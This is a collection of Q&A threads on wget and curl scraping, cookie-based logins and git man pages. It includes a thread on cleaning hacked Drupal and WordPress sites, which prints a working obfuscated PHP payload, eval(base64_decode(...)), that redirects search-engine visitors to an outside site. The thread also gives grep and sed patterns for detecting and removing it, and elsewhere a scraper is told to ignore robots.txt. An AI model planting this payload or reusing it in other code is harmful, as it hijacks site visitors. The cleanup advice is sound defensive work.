I'd like to write a simple web spider, or just use wget, to download PDF results from Google Scholar. That would actually be quite a spiffy way to get papers for research.
I have read the following pages on stackoverflow:
Crawl website using wget and limit total number of crawled links
How do web spiders differ from Wget's spider?
Downloading all PDF files from a website
How to download all files (but not HTML) from a website using wget?
The last page is probably the most inspirational of all. I did try using wget as suggested there.
I ran it against my Google Scholar search results page, but nothing was downloaded.
Given that my level of understanding of web spiders is minimal, what should I do to make this possible? I do realize that writing a spider is perhaps very involved and is a project I may not want to undertake. If it is possible using wget, that would be absolutely awesome.
wget -e robots=off -H --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -r -l 1 -nd -A pdf "http://scholar.google.com/scholar?q=filetype%3Apdf+liquid+films&btnG=&hl=en&as_sdt=0%2C23"
A few things to note:
Use of filetype:pdf in the search query
One level of recursion
-A pdf for only accepting pdfs
-H to span hosts
-e robots=off and --user-agent together will ensure the best results: Google Scholar rejects a blank user agent, and PDF repositories are likely to disallow robots.
The limitation of course is that this will only hit the first page of results. You could expand the depth of recursion, but this will run wild and take forever. I would recommend using a combination of something like Beautiful Soup and wget subprocesses, so that you can parse and traverse the search results strategically.
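If you prefer to stay in the shell rather than reach for Beautiful Soup, here is a rough sketch of the same idea in plain wget and grep: save the results page, pull out anything that looks like a direct PDF link, then feed those links back to wget. The query URL and user agent are the ones from the command above; the link-extraction pattern is only a guess at what the results markup exposes, so treat it as a starting point rather than a finished scraper.
# 1. Save the first page of results (same query and user agent as above)
wget -e robots=off --user-agent="Mozilla/5.0" -O results.html "http://scholar.google.com/scholar?q=filetype%3Apdf+liquid+films&btnG=&hl=en&as_sdt=0%2C23"
# 2. Pull out anything that looks like a direct PDF link (a rough pattern; adjust as needed)
grep -oE 'http[^"]+\.pdf' results.html | sort -u > pdf-urls.txt
# 3. Fetch each PDF from whatever repository hosts it
wget -e robots=off --user-agent="Mozilla/5.0" -nd -A pdf -i pdf-urls.txt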
Related
I need to log in to a website that requires credentials. After that, I need to click on a link (the link URL changes every day, but there is only ever one link on the page). Once the link is clicked, a file is downloaded. I achieved this using Selenium on Windows, but I am not sure how to do it on UNIX. From searching around I understand that wget or curl can be used, but they need the URL specified directly, and I don't know it before logging in.
Here is a "hand wavey" answer.
Use curl or wget to get the first page. It will be a text file.
Use tools like sed and grep to pull out the URL. Then use curl / wget to get the target file. If it is a simple page with one link, this should be rather easy to do.
You can get curl / wget from perzl.
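To make that a bit more concrete, here is a minimal sketch of the flow. The URLs, form field names and file pattern are all placeholders; you would need to inspect the real login form and download page to fill them in.
# 1. Log in and save the session cookie (field names are placeholders --
#    download the login page first to see what the form actually posts)
curl -c cookies.txt -d "username=me&password=secret" "http://example.com/login"
# 2. Fetch the page that contains the daily link and pull the URL out of it
curl -b cookies.txt "http://example.com/downloads" -o page.html
url=$(grep -oE 'https?://[^"]+\.zip' page.html | head -n 1)
# 3. Download the target file with the same session
curl -b cookies.txt -o today.zip "$url"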
I'm taking the git man page as an example, but I have seen the pattern I am about to describe in many places throughout UNIX/Linux.
Under the git man page, it has the following header:
Main Porcelain Commands
Underneath this header, there are a lot of commands written with dashes, such as:
git-clone
Since that is listed under Commands, you would assume that git-clone is a command (I know very well that git clone [directory] is valid).
But it appears that it isn't, so why does the man page list git-clone as a command? The man pages are good, if you can decode them right.
On my system it says git-clone(1). That is the name of a man page about a command, not a command itself.
man git-clone gives:
SYNOPSIS
git clone [--template=<template_directory>]
… showing it with the space instead of the dash.
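A quick way to see the two side by side (the repository URL is just a placeholder):
git clone http://example.com/repo.git    # the command itself uses a space
man git-clone                            # the manual page for it uses a dash
git help clone                           # opens the same git-clone(1) page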
Before I start the question off, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After this, you have access to everything on the website. Logins do timeout after so long, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all child folders. My issue, however, is that each child has an index.html of the same login page. It's like the cookie worked fine for the root folder but nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example#test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data variables/ids are different and that I had to download the login page to see what they were.
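One way to see what a login form actually posts, without opening a browser, is to dump its input fields; the field names will of course differ from site to site:
# List the input fields on the login form to find the names to use in --post-data
wget -qO- http://site.here.com/users/login | grep -oE '<input[^>]+name="[^"]+"'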
Secondly, note that if I didn't set the remember_me value to 1, cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result is that the former would only download the login page, while the latter gets to all the child folders, but each child contains just an index of the login page and nothing else.
I'm kind of stuck and my experience with wget and http is very limited. What would you do to get past this? Generate a cookie for each child? How would you automate that instead of manually creating a cookie file for each child?
P.S.: I'm using Linux, in case that affects the answers I'm given.
Figured it out. Kind of.
When I wget with the options above, I get all the children. If I then wget each child (again with the options above) and make sure to specify the folder by ending the URL with "/", it works.
Not sure why the behavior is like this, but it is. When I do this, it has no problem grabbing the children's children, or anything beneath them.
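If there are many children, a small loop saves retyping; the folder names here are placeholders for whatever the root listing actually shows:
# Fetch each child folder separately, keeping the trailing slash
for child in users docs files; do
    wget "http://site.here.com/$child/" --load-cookies cookies.txt --keep-session-cookies -r -np
done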
I've been having issues on my server with the following PHP injected into all of my Drupal and WordPress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++, is there a *.*-style search pattern I could use to scan my backup files and delete the lines of malicious code, without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with an empty string, but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes, a regex like this should sort it out:
eval\(base64_decode\("[\d\w]+"\)\);
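If you would rather batch the cleanup from the command line than open every file in Notepad++, the same idea can be handed to find and sed. Run it against a copy of the backup first, and note that base64 payloads can also contain +, / and =, so the character class is wider here than in the regex above; the backup/ path is a placeholder.
# Strip the injected line from every .php file in the backup copy;
# sed -i.bak keeps an untouched copy of each file next to the cleaned one
find backup/ -name '*.php' -exec sed -i.bak 's|eval(base64_decode("[A-Za-z0-9+/=]\+"));||g' {} +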
I've also had the same problem with my WordPress blogs: the eval base64_decode hack. The PHP files were being injected with those eval lines. I suggest you reinstall WordPress/Drupal, as other scripts may already be present on your site, then change all passwords.
Try running grep over SSH, e.g. grep -r -H "eval(base64_decode". It will show you which files are infected. Then, if you have time, automate the process so you will be notified if it happens again.
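As a rough sketch of that kind of automation (the web root and address are placeholders), a daily cron entry could mail you the list of matching files whenever grep finds any:
# grep exits non-zero when nothing matches, so mail is only sent when there is a hit
0 3 * * * grep -R -l "eval(base64_decode" /var/www > /tmp/eval-hits && mail -s "possible code injection" you@example.com < /tmp/eval-hits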
And in the future, always update WordPress/Drupal.
It's easier if you can use dedicated tools to remove this malicious code, because it can be tricky to find a regex that matches all of it, and you never know whether it worked or whether you broke your site. Especially when you have multiple files, you should first identify the suspicious files with the following commands:
grep -R "eval.*base64_decode" .
grep -R "return.*base64_decode" .
but that may not be enough, so you should also consider using PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?
I am testing one of my server implementations and was wondering if I could make curl fetch embedded content. I mean, when a browser loads a page, it downloads all the associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download all the files that are necessary to properly display a given HTML page.
If you want to download recursively, use wget with the -r option instead of curl. Also check the wget man page for options that restrict the download to certain types of files (for example -A).
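For example, to grab a single page with everything it needs, or to go one level deep as well (placeholder URL):
# Fetch one page plus the images, CSS and scripts it needs, rewriting links for local viewing
wget --page-requisites --convert-links http://example.com/page.html
# Or recurse one level deep while still fetching each page's requisites
wget -r -l 1 --page-requisites http://example.com/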